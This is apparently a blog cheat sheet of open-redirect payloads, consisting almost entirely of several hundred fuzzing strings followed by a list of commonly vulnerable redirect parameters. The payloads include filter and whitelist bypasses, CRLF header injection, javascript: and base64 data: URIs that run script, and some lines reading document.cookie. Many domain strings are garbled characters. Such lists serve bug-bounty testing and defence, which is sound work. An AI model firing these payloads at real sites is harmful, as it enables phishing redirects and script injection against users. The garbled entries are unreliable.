Open Redirect Cheat Sheet

02 Nov 2018 Cheatsheets

Hi, this is a cheat sheet for Open redirect vulnerabilities.

It’s a first draft. I will update it every time I find a new payload, tip or writeup. So if you’re interested in open redirects, keep an eye on this page!

open-redirect-cheatsheet.png

Fuzzing (Detection)

Open redirect payloads

Payloads to detect open redirection:

<>//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
//;@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/////β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
/////β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
////β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦//
////β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
///\;@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦//
///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
//\/β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦//
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/.β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/\/β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
/γ€±β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
.β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
\/\/β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
γ€±β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒ%00qPⓦ
%01https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
%01https://google.com
////%09/β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
///%09/β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
//%09/β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/%09/β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
////%09/google.com
///%09/google.com
//%09/google.com
/%09/google.com
/%09/javascript:alert(1);
/%09/javascript:alert(1)
////%09/[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
///%09/[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
//%09/[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/%09/[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
////%09/[email protected]
///%09/[email protected]
//%09/[email protected]
/%09/[email protected]
&%0d%0a1Location:https://google.com
\152\141\166\141\163\143\162\151\160\164\072alert(1)
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
////β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e
///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e
////β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e%2f
///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e%2f
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e%2f
////β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f..
///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f..
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f..
%2f216.58.214.206//
%2f216.58.214.206
%2f216.58.214.206%2f%2f
////β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
/β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
//%2f%2fβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/%2f%2fβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
%2f$2f216.58.214.206
$2f%2f216.58.214.206%2f%2f
%2f$2f3627734734
$2f%2f3627734734%2f%2f
//%2f%2fgoogle.com
/%2f%2fgoogle.com
$2f%2fgoogle.com
%2f$2fgoogle.com
$2f%2fgoogle.com%2f%2f
%2f3627734734//
%2f3627734734
%2f3627734734%2f%2f
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com//
%2fgoogle.com
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
//[email protected]@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
//[email protected][email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
//[email protected]@google.com/
//[email protected][email protected]/
////%5cβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
///%5cβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
//%5cβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/%5cβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
////%5cgoogle.com
///%5cgoogle.com
//%5cgoogle.com
/%5cgoogle.com
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
////%[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
///%[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
//%[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/%[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
////%[email protected]
///%[email protected]
//%[email protected]
/%[email protected]
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦:[email protected]/
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦:80#@whitelisted.com/
";alert(0);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:whitelisted.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒ%E3%80%82pw
//google%00.com
/\google%252ecom
google%252ecom
<>//google.com
/<>//google.com
//;@google.com
///;@google.com
/////google.com/
/////google.com
////\;@google.com
////google.com//
////google.com/
////google.com
///\;@google.com
///google.com//
///google.com/
///google.com
//\/google.com/
//\google.com
//google.com//
//google.com/
//google.com
/.google.com
/\/\/google.com/
/\/google.com/
/\/google.com
/\google.com
/γ€±google.com
/google.com
../google.com
.google.com
@google.com
\/\/google.com/
γ€±google.com
google.com
google.com%[email protected]
////google.com/%2e%2e
///google.com/%2e%2e
//google.com/%2e%2e
/google.com/%2e%2e
//google.com/%2E%2E
////google.com/%2e%2e%2f
///google.com/%2e%2e%2f
//google.com/%2e%2e%2f
////google.com/%2f..
///google.com/%2f..
//google.com/%2f..
//google.com/%2F.. 
/google.com/%2F.. 
////google.com/%2f%2e%2e
///google.com/%2f%2e%2e
//google.com/%2f%2e%2e
/google.com/%2f%2e%2e
//google.com//%2F%2E%2E
//google.com:[email protected]/
//google.com:80#@whitelisted.com/
google.com/.jpg
//google.com\twhitelisted.com/
//google.com/whitelisted.com
//google.com\@whitelisted.com
google.com/whitelisted.com
//google%E3%80%82com
/http://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/http:/β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
http://;@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
http://.β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
http:/β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
http:β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
http://00330.00072.0000326.00000316
http:00330.00072.0000326.00000316
http://00330.0x3a.54990
http:00330.0x3a.54990
http://00330.3856078
http:00330.3856078
http://0330.072.0326.0316
http:0330.072.0326.0316
http:%0a%0dβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
http:%0a%0dgoogle.com
http://0xd8.072.54990
http:0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http:0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http:0xd8.3856078
http://0xd83ad6ce
http:0xd83ad6ce
http://[::216.58.214.206]
http:[::216.58.214.206]
http://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦%23.whitelisted.com/
http://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦%2f%2f.whitelisted.com/
http://3627734734
http:3627734734
http://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦%3F.whitelisted.com/
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected][::216.58.214.206]
http:[email protected][::216.58.214.206]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected][::ffff:216.58.214.206]
http:[email protected][::ffff:216.58.214.206]
http://[email protected]@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
http://[email protected][email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
http://[email protected]@google.com/
http://[email protected][email protected]/
http://472.314.470.462
http:472.314.470.462
http://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦%5c%5c.whitelisted.com/
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦:[email protected]/
http://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦:80#@whitelisted.com/
http://[::ffff:216.58.214.206]
http:[::ffff:216.58.214.206]
/http://google.com
/http:/google.com
http://;@google.com
http://.google.com
http://google.com
http:/\/\google.com
http:/google.com
http:google.com
http://google.com%23.whitelisted.com/
http://google.com%2f%2f.whitelisted.com/
http://google.com%3F.whitelisted.com/
http://google.com%5c%5c.whitelisted.com/
http://google.com:[email protected]/
http://google.com:80#@whitelisted.com/
http://google.com\twhitelisted.com/
//https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦//
/https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦//
https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
https:β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
https://%09/β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/https://%09/google.com
https://%09/google.com
https://%09/[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
https://%09/[email protected]
https://%0a%0dβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
https://%0a%0dgoogle.com
//https:///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e
/https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e
https:///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e
//https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e%2f
https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e%2f
/https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f..
https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f..
/https:///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
/https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
https:///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
https%3a%2f%2fgoogle.com%2f
/https://%5cβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/https:/%5cβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
https://%5cβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
https:/%5cβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
/https://%5cgoogle.com
/https:/%5cgoogle.com/
https://%5cgoogle.com
https:/%5cgoogle.com/
/https://%[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
https://%[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/https://%[email protected]
https://%[email protected]
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//https://google.com//
/https://google.com//
/https://google.com/
/https://google.com
/https:google.com
https://////google.com
https://google.com//
https://google.com/
https://google.com
https:/\google.com
https:google.com
//https:///google.com/%2e%2e
/https://google.com/%2e%2e
https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
/https://google.com/%2f..
https://google.com/%2f..
/https:///google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://:@google.com\@whitelisted.com
https://google.com?whitelisted.com
https://google.com/whitelisted.com
https://google.com\whitelisted.com
https://google.com#whitelisted.com
https://google%E3%80%82com
//https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦//
/https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
https://:@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦\@whitelisted.com
https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/whitelisted.com
https://whitelisted.com;@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦//
https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
/https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e
https:///[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e
//https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e%2f
https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e%2f
/https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f..
https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f..
/https:///[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
/https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
https:///[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
https://[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
//https://[email protected]//
/https://[email protected]/
https://whitelisted.com;@google.com
https://whitelisted.com.google.com
https://[email protected]//
https://[email protected]/
https://[email protected]
/https://[email protected]/%2e%2e
https:///[email protected]/%2e%2e
//https://[email protected]/%2e%2e%2f
https://[email protected]/%2e%2e%2f
/https://[email protected]/%2f..
https://[email protected]/%2f..
/https:///[email protected]/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
https:///[email protected]/%2f%2e%2e
https://[email protected]/%2f%2e%2e
/https://[email protected]/%2f.//[email protected]/%2f..
https://whitelisted.com/https://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
https://whitelisted.com/https://google.com/
@https://www.google.com
http://β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦\twhitelisted.com/
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://[email protected][::216.58.214.206]
http:[email protected][::216.58.214.206]
http://whitelisted.com%2eβ“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
http://whitelisted.com%2egoogle.com/
http://[email protected]
http:[email protected]
http://[email protected]
http:[email protected]
http://whitelisted.com:80%40β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
http://whitelisted.com:80%40google.com/
http://[email protected][::ffff:216.58.214.206]
http:[email protected][::ffff:216.58.214.206]
http://[email protected]/
http://whitelisted.com+&@google.com#[email protected]/
http://whitelisted.com+&@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦#[email protected]/
http://www.google.com\.whitelisted.com
http://www.β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦\.whitelisted.com
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected][::216.58.214.206]
http:XY>.7d8T\[email protected][::216.58.214.206]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected][::ffff:216.58.214.206]
http:XY>.7d8T\[email protected][::ffff:216.58.214.206]
http://XY>.7d8T\[email protected]@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
http://XY>.7d8T\[email protected][email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
http://XY>.7d8T\[email protected]@google.com/
http://XY>.7d8T\[email protected][email protected]/
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦\twhitelisted.com/
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
////[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦//
////[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
///[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦//
///[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/whitelisted.com
//β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦\@whitelisted.com
//[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦//
//[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/whitelisted.com
whitelisted.com;@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦
////[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e
///[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e
////[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e%2f
///[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e%2f
//[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e%2f
////[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f..
///[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f..
//[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f..
////[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
///[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
//[email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2f%2e%2e
/\whitelisted.com:80%40google.com
[email protected]%E2%80%[email protected]
////[email protected]//
////[email protected]/
///[email protected]//
///[email protected]/
//[email protected]//
//[email protected]/
whitelisted.com;@google.com
whitelisted.com.google.com
////[email protected]/%2e%2e
///[email protected]/%2e%2e
////[email protected]/%2e%2e%2f
///[email protected]/%2e%2e%2f
//[email protected]/%2e%2e%2f
////[email protected]/%2f..
///[email protected]/%2f..
//[email protected]/%2f..
////[email protected]/%2f%2e%2e
///[email protected]/%2f%2e%2e
//[email protected]/%2f%2e%2e
//whitelisted.com+&@google.com#[email protected]/
//[email protected]:///β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/%2e%2e
//[email protected]:///google.com/%2e%2e
//whitelisted.com+&@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦#[email protected]/
/x:1/:///%01javascript:alert(document.cookie)/
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
//XY>.7d8T\[email protected]@β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
//XY>.7d8T\[email protected][email protected]β“π¨π—°οΏ½π•β…†π“Έβ“œβ‚β„Ήβ“ƒο½‘οΌ°β“¦/
//XY>.7d8T\[email protected]@google.com/
//XY>.7d8T\[email protected][email protected]/

Common injection points / parameters

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
